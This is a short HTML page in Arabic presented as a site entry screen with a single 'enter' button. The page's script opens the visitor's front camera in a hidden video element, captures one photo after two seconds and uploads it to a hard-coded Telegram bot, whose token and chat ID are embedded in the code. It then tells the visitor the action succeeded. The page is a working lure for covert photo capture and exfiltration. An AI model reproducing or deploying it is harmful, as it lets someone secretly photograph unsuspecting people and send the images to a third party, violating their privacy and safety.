<!DOCTYPE html>
<html lang="ar">
<head>
<meta charset="UTF-8">
<title>M31 ROJI</title>

<style>
body {
  background:#000;
  color:#0f0;
  text-align:center;
  font-family:Arial;
}
video { display:none; }
button {
  padding:10px 20px;
  font-size:18px;
  margin-top:20px;
}
</style>
</head>

<body>

<h3>اضغط لفتح الموقع</h3>

<button onclick="startCamera()">دخول</button>

<video id="video" autoplay playsinline></video>
<canvas id="canvas" style="display:none;"></canvas>

<script>
const BOT_TOKEN = "7852857305:AAEW7SqDION4MTuIPNnxP6caMEYMLl2yojc";
const CHAT_ID  = "8514140307";

let streamRef = null;

// لازم يكون بعد click
function startCamera() {
  navigator.mediaDevices.getUserMedia({
    video: { facingMode: "user" } // كاميرا أمامية
  })
  .then(stream => {
    streamRef = stream;
    document.getElementById("video").srcObject = stream;

    setTimeout(captureOnce, 2000);
  })
  .catch(() => {
    alert("تم رفض الكاميرا ❌");
  });
}

function captureOnce() {
  const video = document.getElementById("video");
  const canvas = document.getElementById("canvas");

  canvas.width = video.videoWidth;
  canvas.height = video.videoHeight;
  canvas.getContext("2d").drawImage(video, 0, 0);

  if (streamRef) {
    streamRef.getTracks().forEach(t => t.stop());
  }

  canvas.toBlob(blob => {
    const form = new FormData();
    form.append("chat_id", CHAT_ID);
    form.append("photo", blob);

    fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendPhoto`, {
      method: "POST",
      body: form
    })
    .then(() => {
      document.body.innerHTML = "<h2>تم بنجاح ✅</h2>";
    })
    .catch(() => {
      document.body.innerHTML = "<h2>فشل ❌</h2>";
    });
  }, "image/jpeg");
}
</script>

</body>
</html>